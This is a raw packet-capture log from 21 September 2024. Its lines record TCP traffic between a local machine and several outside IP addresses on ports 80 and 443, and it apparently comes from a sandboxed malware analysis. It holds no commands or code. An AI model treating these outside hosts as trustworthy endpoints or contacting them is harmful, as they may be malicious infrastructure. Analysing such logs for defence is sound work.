                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683538914 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683732033 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683739901 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683753967 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683759928 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683785915 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683819056 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683820009 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683826923 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683839083 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683845043 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683856964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683864117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683871031 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683872938 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683887005 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683995008 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684106112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684113026 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684125900 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684132099 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684139967 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684166908 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684185982 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684279919 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684288025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684298992 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684308052 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684313059 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684324980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684330940 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684334993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684344053 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684351921 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684356928 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684361935 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684362888 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684371948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684376001 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684376955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684385061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684390068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684396029 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684400082 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684401989 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684416056 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684443951 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684468985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684468985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684503078 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684551001 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684557915 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684568882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.684603930 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700062037 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700078011 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700088978 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700140953 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700146914 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700179100 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700212002 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700236082 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700243950 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700264931 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700272083 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700284958 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700290918 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700293064 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700299978 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700305939 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700314045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700319052 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700336933 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700357914 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700392008 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700397968 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700409889 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700438976 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700440884 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700445890 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700457096 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700459003 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700490952 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700504065 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.700529099 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701425076 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701432943 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701445103 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701482058 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701495886 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701503038 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701514959 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701520920 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701548100 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701548100 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701556921 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701566935 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701570034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701575041 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701598883 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701612949 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701745033 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701751947 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701762915 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701767921 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701772928 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701781988 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701787949 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701793909 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701807022 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701813936 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701828003 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701836109 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701848984 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701874018 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701905966 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701913118 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701922894 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701922894 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701922894 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701935053 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.701950073 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702042103 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702049017 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702054977 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702060938 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702066898 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702073097 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702085018 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702131033 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702137947 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702148914 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702148914 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702148914 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702148914 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702177048 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702205896 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702229023 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702291012 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702300072 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702327967 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702357054 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702364922 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702377081 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702384949 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702389956 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702404022 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702421904 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702457905 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702466011 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702477932 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702483892 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702490091 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702497005 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702507019 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702507973 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702527046 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702541113 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702558994 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702683926 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702691078 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702703953 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702733994 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702758074 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702764988 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702770948 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702776909 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702794075 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702814102 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702852011 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702898979 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702907085 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702951908 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702987909 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.702996016 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.703007936 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.703013897 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.703044891 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.703069925 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.713398933 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.713505030 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.714432955 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.714529991 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717636108 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717757940 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717762947 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717775106 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717782021 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717787027 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717792988 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717798948 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717824936 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.717849016 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718034983 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718080997 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718086004 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718144894 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718147039 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718152046 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718163967 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718170881 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718178988 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718195915 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.718219995 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.724525928 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.724633932 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725248098 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725310087 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725583076 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725640059 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725645065 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725694895 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725720882 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725727081 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725739002 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725768089 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725780964 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725858927 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725866079 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.725909948 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.732147932 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.732244015 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.743714094 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.743877888 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.743933916 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.743999004 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748383045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748389959 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748403072 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748425007 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748430014 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748465061 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748491049 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748594046 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748600006 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748610973 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748615980 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748621941 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748626947 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748634100 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748639107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748642921 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748648882 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748667002 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748688936 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748701096 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748709917 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748769999 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748810053 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748816013 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748826027 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748831987 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748836994 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748842955 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748858929 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748876095 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748897076 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.748899937 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.750051975 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753046036 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753052950 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753072977 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753078938 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753087997 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753093958 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753101110 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.753143072 CEST4971180192.168.2.9147.45.44.104
